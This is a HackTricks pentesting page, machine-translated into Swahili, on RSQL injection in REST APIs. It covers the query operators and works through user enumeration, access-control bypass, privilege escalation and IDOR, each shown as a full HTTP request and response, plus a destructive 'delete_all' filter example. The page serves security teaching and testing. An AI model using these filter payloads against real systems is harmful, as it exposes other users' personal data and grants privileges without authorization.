HackTricksRSQL Injection
Reading time: 15 minutes
RSQL Injection
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
RSQL Injection
What is RSQL?
RSQL ni lugha ya kuandika maswali iliyoundwa kwa ajili ya kuchuja pembejeo kwa kutumia vigezo katika RESTful APIs. Imejengwa kwa msingi wa FIQL (Feed Item Query Language), ambayo ilitolewa awali na Mark Nottingham kwa ajili ya kuuliza Atom feeds, RSQL inajitofautisha kwa urahisi wake na uwezo wa kueleza maswali magumu kwa njia fupi na inayokubalika na URI juu ya HTTP. Hii inafanya kuwa chaguo bora kama lugha ya maswali ya jumla kwa kutafuta mwisho wa REST.
Overview
RSQL Injection ni udhaifu katika programu za wavuti zinazotumia RSQL kama lugha ya maswali katika RESTful APIs. Kama SQL Injection na LDAP Injection, udhaifu huu hutokea wakati vichujio vya RSQL havijasafishwa ipasavyo, ikiruhusu mshambuliaji kuingiza maswali mabaya ili kufikia, kubadilisha au kufuta data bila idhini.
How does it work?
RSQL inakuwezesha kujenga maswali ya juu katika RESTful APIs, kwa mfano:
bash
/products?filter=price>100;category==electronics
Hii inatafsiri kama ombi lililo na muundo ambalo linachuja bidhaa zenye bei zaidi ya 100 na kundi "electronics".
Ikiwa programu haitathmini ipasavyo pembejeo za mtumiaji, mshambuliaji anaweza kubadilisha chujio ili kutekeleza maombi yasiyotarajiwa, kama:
bash
/products?filter=id=in=(1,2,3);delete_all==true
Au hata kutumia fursa ya kutoa taarifa nyeti kwa kutumia maswali ya Boolean au subqueries zilizozungushwa.
Hatari
- Ufunuo wa data nyeti: Mshambuliaji anaweza kupata taarifa ambazo hazipaswi kupatikana.
- Mabadiliko au kufutwa kwa data: Kuingiza vichujio vinavyobadilisha rekodi za hifadhidata.
- Kuongezeka kwa mamlaka: Manipulation ya vitambulisho vinavyotoa majukumu kupitia vichujio ili kudanganya programu kwa kufikia kwa mamlaka ya watumiaji wengine.
- Kuepuka udhibiti wa ufikiaji: Manipulation ya vichujio ili kufikia data zilizozuiliwa.
- Ujanja au IDOR: Mabadiliko ya vitambulisho kati ya watumiaji kupitia vichujio vinavyoruhusu ufikiaji wa taarifa na rasilimali za watumiaji wengine bila kuthibitishwa ipasavyo kama hivyo.
Watoa huduma wa RSQL wanaoungwa mkono
| Opereta | Maelezo | Mfano |
|---|---|---|
; / and | Opereta wa AND wa kimantiki. Huchuja safu ambapo masharti yote ni ya kweli | /api/v2/myTable?q=columnA==valueA;columnB==valueB |
, / or | Opereta wa OR wa kimantiki. Huchuja safu ambapo angalau moja ya masharti ni ya kweli | /api/v2/myTable?q=columnA==valueA,columnB==valueB |
== | Hufanya uchunguzi wa sawa. Inarudisha safu zote kutoka myTable ambapo thamani katika columnA ni sawa kabisa na queryValue | /api/v2/myTable?q=columnA==queryValue |
=q= | Hufanya uchunguzi wa kutafuta. Inarudisha safu zote kutoka myTable ambapo thamani katika columnA zina queryValue | /api/v2/myTable?q=columnA=q=queryValue |
=like= | Hufanya uchunguzi wa kama. Inarudisha safu zote kutoka myTable ambapo thamani katika columnA ni kama queryValue | /api/v2/myTable?q=columnA=like=queryValue |
=in= | Hufanya uchunguzi wa ndani. Inarudisha safu zote kutoka myTable ambapo columnA ina valueA AU valueB | /api/v2/myTable?q=columnA=in=(valueA, valueB) |
=out= | Hufanya uchunguzi wa ondoa. Inarudisha safu zote za myTable ambapo thamani katika columnA si valueA wala valueB | /api/v2/myTable?q=columnA=out=(valueA,valueB) |
!= | Hufanya uchunguzi wa sio sawa. Inarudisha safu zote kutoka myTable ambapo thamani katika columnA si sawa na queryValue | /api/v2/myTable?q=columnA!=queryValue |
=notlike= | Hufanya uchunguzi wa sio kama. Inarudisha safu zote kutoka myTable ambapo thamani katika columnA si kama queryValue | /api/v2/myTable?q=columnA=notlike=queryValue |
< & =lt= | Hufanya uchunguzi wa chini ya. Inarudisha safu zote kutoka myTable ambapo thamani katika columnA ni chini ya queryValue | /api/v2/myTable?q=columnA<queryValue /api/v2/myTable?q=columnA=lt=queryValue |
=le= & <= | Hufanya uchunguzi wa chini ya au sawa na. Inarudisha safu zote kutoka myTable ambapo thamani katika columnA ni chini ya au sawa na queryValue | /api/v2/myTable?q=columnA<=queryValue /api/v2/myTable?q=columnA=le=queryValue |
> & =gt= | Hufanya uchunguzi wa zaidi ya. Inarudisha safu zote kutoka myTable ambapo thamani katika columnA ni zaidi ya queryValue | /api/v2/myTable?q=columnA>queryValue /api/v2/myTable?q=columnA=gt=queryValue |
>= & =ge= | Hufanya uchunguzi wa sawa na au zaidi ya. Inarudisha safu zote kutoka myTable ambapo thamani katika columnA ni sawa na au zaidi ya queryValue | /api/v2/myTable?q=columnA>=queryValue /api/v2/myTable?q=columnA=ge=queryValue |
=rng= | Hufanya uchunguzi wa kuanzia hadi. Inarudisha safu zote kutoka myTable ambapo thamani katika columnA ni sawa au zaidi ya fromValue, na chini ya au sawa na toValue | /api/v2/myTable?q=columnA=rng=(fromValue,toValue) |
Kumbuka: Jedwali lina msingi wa taarifa kutoka MOLGENIS na rsql-parser programu.
Mifano
- name=="Kill Bill";year=gt=2003
- name=="Kill Bill" and year>2003
- genres=in=(sci-fi,action);(director=='Christopher Nolan',actor==*Bale);year=ge=2000
- genres=in=(sci-fi,action) and (director=='Christopher Nolan' or actor==*Bale) and year>=2000
- director.lastName==Nolan;year=ge=2000;year=lt=2010
- director.lastName==Nolan and year>=2000 and year<2010
- genres=in=(sci-fi,action);genres=out=(romance,animated,horror),director==Que*Tarantino
- genres=in=(sci-fi,action) and genres=out=(romance,animated,horror) or director==Que*Tarantino
Kumbuka: Jedwali lina msingi wa taarifa kutoka rsql-parser programu.
Vichujio vya kawaida
Vichujio hivi husaidia kuboresha maswali katika APIs:
| Kichujio | Maelezo | Mfano |
|---|---|---|
filter[users] | Huchuja matokeo kwa watumiaji maalum | /api/v2/myTable?filter[users]=123 |
filter[status] | Huchuja kwa hali (hai/siyo hai, kukamilika, nk.) | /api/v2/orders?filter[status]=active |
filter[date] | Huchuja matokeo ndani ya kipindi cha tarehe | /api/v2/logs?filter[date]=gte:2024-01-01 |
filter[category] | Huchuja kwa aina au aina ya rasilimali | /api/v2/products?filter[category]=electronics |
filter[id] | Huchuja kwa kitambulisho cha kipekee | /api/v2/posts?filter[id]=42 |
Parameta za kawaida
Parameta hizi husaidia kuboresha majibu ya API:
| Parameta | Maelezo | Mfano |
|---|---|---|
include | Inajumuisha rasilimali zinazohusiana katika jibu | /api/v2/orders?include=customer,items |
sort | Hupanga matokeo kwa mpangilio wa kuongezeka au kupungua | /api/v2/users?sort=-created_at |
page[size] | Inadhibiti idadi ya matokeo kwa kila ukurasa | /api/v2/products?page[size]=10 |
page[number] | Inabainisha nambari ya ukurasa | /api/v2/products?page[number]=2 |
fields[resource] | Inafafanua ni maeneo gani ya kurudishwa katika jibu | /api/v2/users?fields[users]=id,name,email |
search | Hufanya utafutaji wa kubadilika zaidi | /api/v2/posts?search=technology |
Ufunuo wa taarifa na uhesabuji wa watumiaji
Ombi lifuatalo linaonyesha mwisho wa usajili ambao unahitaji parameta ya barua pepe ili kuangalia kama kuna mtumiaji yeyote aliyejiandikisha kwa barua pepe hiyo na kurudisha kweli au uongo kulingana na kama ipo katika hifadhidata:
Ombi
GET /api/registrations HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Jibu
HTTP/1.1 400
Date: Sat, 22 Mar 2025 14:47:14 GMT
Content-Type: application/vnd.api+json
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
Content-Length: 85
{
"errors": [{
"code": "BLANK",
"detail": "Missing required param: email",
"status": "400"
}]
}
Ingawa /api/registrations?email=<emailAccount> inatarajiwa, inawezekana kutumia RSQL filters kujaribu kuhesabu na/au kutoa taarifa za mtumiaji kupitia matumizi ya waendeshaji maalum:
Request
GET /api/registrations?filter[userAccounts]=email=='test@test.com' HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Origin: https://locahost:3000
Connection: keep-alive
Referer: https://locahost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Jibu
HTTP/1.1 200
Date: Sat, 22 Mar 2025 14:09:38 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 38
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": {
"attributes": {
"tenants": []
}
}
}
Katika kesi ya kulinganisha akaunti halali ya barua pepe, programu itarudisha taarifa za mtumiaji badala ya “true”, "1" au chochote katika jibu kwa seva:
Request
GET /api/registrations?filter[userAccounts]=email=='manuel**********@domain.local' HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Jibu
HTTP/1.1 200
Date: Sat, 22 Mar 2025 14:19:46 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 293
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": {
"id": "********************",
"type": "UserAccountDTO",
"attributes": {
"id": "********************",
"type": "UserAccountDTO",
"email": "manuel**********@domain.local",
"sub": "*********************",
"status": "ACTIVE",
"tenants": [{
"id": "1"
}]
}
}
}
Authorization evasion
Katika hali hii, tunaanzia kwa mtumiaji mwenye jukumu la msingi na ambapo hatuna ruhusa za kipaumbele (kwa mfano, msimamizi) kupata orodha ya watumiaji wote waliosajiliwa katika hifadhidata:
Request
GET /api/users HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJhb.................
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Jibu
HTTP/1.1 403
Date: Sat, 22 Mar 2025 14:40:07 GMT
Content-Length: 0
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
Tena tunatumia filters na opereta maalum ambazo zitaturuhusu njia mbadala ya kupata taarifa za watumiaji na kuepuka udhibiti wa ufikiaji. Kwa mfano, chujio kwa watumiaji ambao wana herufi “a” katika ID yao ya mtumiaji:
Request
GET /api/users?filter[users]=id=in=(*a*) HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJhb.................
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Jibu
HTTP/1.1 200
Date: Sat, 22 Mar 2025 14:43:28 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 1434192
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": [{
"id": "********A***********",
"type": "UserGetResponseCustomDTO",
"attributes": {
"status": "ACTIVE",
"countryId": 63,
"timeZoneId": 3,
"translationKey": "************",
"email": "**********@domain.local",
"firstName": "rafael",
"surname": "************",
"telephoneCountryCode": "**",
"mobilePhone": "*********",
"taxIdentifier": "********",
"languageId": 1,
"createdAt": "2024-08-09T10:57:41.237Z",
"termsOfUseAccepted": true,
"id": "******************",
"type": "UserGetResponseCustomDTO"
}
}, {
"id": "*A*******A*****A*******A******",
"type": "UserGetResponseCustomDTO",
"attributes": {
"status": "ACTIVE",
"countryId": 63,
"timeZoneId": 3,
"translationKey": ""************",
"email": "juan*******@domain.local",
"firstName": "juan",
"surname": ""************",",
"telephoneCountryCode": "**",
"mobilePhone": "************",
"taxIdentifier": "************",
"languageId": 1,
"createdAt": "2024-07-18T06:07:37.68Z",
"termsOfUseAccepted": true,
"id": "*******************",
"type": "UserGetResponseCustomDTO"
}
}, {
................
Privilege Escalation
Ni uwezekano mkubwa kupata mwisho fulani ambao huangalia haki za mtumiaji kupitia jukumu lao. Kwa mfano, tunashughulika na mtumiaji ambaye hana haki:
Request
GET /api/companyUsers?include=role HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJhb......
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Jibu
HTTP/1.1 200
Date: Sat, 22 Mar 2025 19:13:08 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 11
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": []
}
Kwa kutumia opereta fulani tunaweza kuhesabu watumiaji wa msimamizi:
Request
GET /api/companyUsers?include=role&filter[companyUsers]=user.id=='94****************************' HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJh.....
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Jibu
HTTP/1.1 200
Date: Sat, 22 Mar 2025 19:13:45 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 361
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": [{
"type": "CompanyUserGetResponseDTO",
"attributes": {
"companyId": "FA**************",
"companyTaxIdentifier": "B999*******",
"bizName": "company sl",
"email": "jose*******@domain.local",
"userRole": {
"userRoleId": 1,
"userRoleKey": "general.roles.admin"
},
"companyCountryTranslationKey": "*******",
"type": "CompanyUserGetResponseDTO"
}
}]
}
Baada ya kujua kitambulisho cha mtumiaji wa msimamizi, itakuwa inawezekana kutumia kupandisha hadhi kwa kubadilisha au kuongeza kichujio kinachofanana na kitambulisho cha msimamizi na kupata haki sawa:
Request
GET /api/functionalities/allPermissionsFunctionalities?filter[companyUsers]=user.id=='94****************************' HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJ.....
Origin: https:/localhost:3000
Connection: keep-alive
Referer: https:/localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Jibu
HTTP/1.1 200
Date: Sat, 22 Mar 2025 18:53:00 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 68833
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"meta": {
"Functionalities": [{
"functionalityId": 1,
"permissionId": 1,
"effectivePriority": "PERMIT",
"effectiveBehavior": "PERMIT",
"translationKey": "general.userProfile",
"type": "FunctionalityPermissionDTO"
}, {
"functionalityId": 2,
"permissionId": 2,
"effectivePriority": "PERMIT",
"effectiveBehavior": "PERMIT",
"translationKey": "general.my_profile",
"type": "FunctionalityPermissionDTO"
}, {
"functionalityId": 3,
"permissionId": 3,
"effectivePriority": "PERMIT",
"effectiveBehavior": "PERMIT",
"translationKey": "layout.change_user_data",
"type": "FunctionalityPermissionDTO"
}, {
"functionalityId": 4,
"permissionId": 4,
"effectivePriority": "PERMIT",
"effectiveBehavior": "PERMIT",
"translationKey": "general.configuration",
"type": "FunctionalityPermissionDTO"
}, {
.......
Impersonate or Insecure Direct Object References (IDOR)
Mbali na matumizi ya parameter ya filter, inawezekana kutumia parameters nyingine kama include ambayo inaruhusu kujumuisha katika matokeo parameters fulani (mfano: lugha, nchi, nywila...).
Katika mfano ufuatao, taarifa za wasifu wetu wa mtumiaji zinaonyeshwa:
Request
GET /api/users?include=language,country HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJ......
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Jibu
HTTP/1.1 200
Date: Sat, 22 Mar 2025 19:47:27 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 540
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": [{
"id": "D5********************",
"type": "UserGetResponseCustomDTO",
"attributes": {
"status": "ACTIVE",
"countryId": 63,
"timeZoneId": 3,
"translationKey": "**********",
"email": "domingo....@domain.local",
"firstName": "Domingo",
"surname": "**********",
"telephoneCountryCode": "**",
"mobilePhone": "******",
"languageId": 1,
"createdAt": "2024-03-11T07:24:57.627Z",
"termsOfUseAccepted": true,
"howMeetUs": "**************",
"id": "D5********************",
"type": "UserGetResponseCustomDTO"
}
}]
}
Mchanganyiko wa filters unaweza kutumika kukwepa udhibiti wa idhini na kupata ufikiaji wa profaili za watumiaji wengine:
Request
GET /api/users?include=language,country&filter[users]=id=='94***************' HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJ....
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Jibu
HTTP/1.1 200
Date: Sat, 22 Mar 2025 19:50:07 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 520
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": [{
"id": "94******************",
"type": "UserGetResponseCustomDTO",
"attributes": {
"status": "ACTIVE",
"countryId": 63,
"timeZoneId": 2,
"translationKey": "**************",
"email": "jose******@domain.local",
"firstName": "jose",
"surname": "***************",
"telephoneCountryCode": "**",
"mobilePhone": "********",
"taxIdentifier": "*********",
"languageId": 1,
"createdAt": "2024-11-21T08:29:05.833Z",
"termsOfUseAccepted": true,
"id": "94******************",
"type": "UserGetResponseCustomDTO"
}
}]
}
Marejeo
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.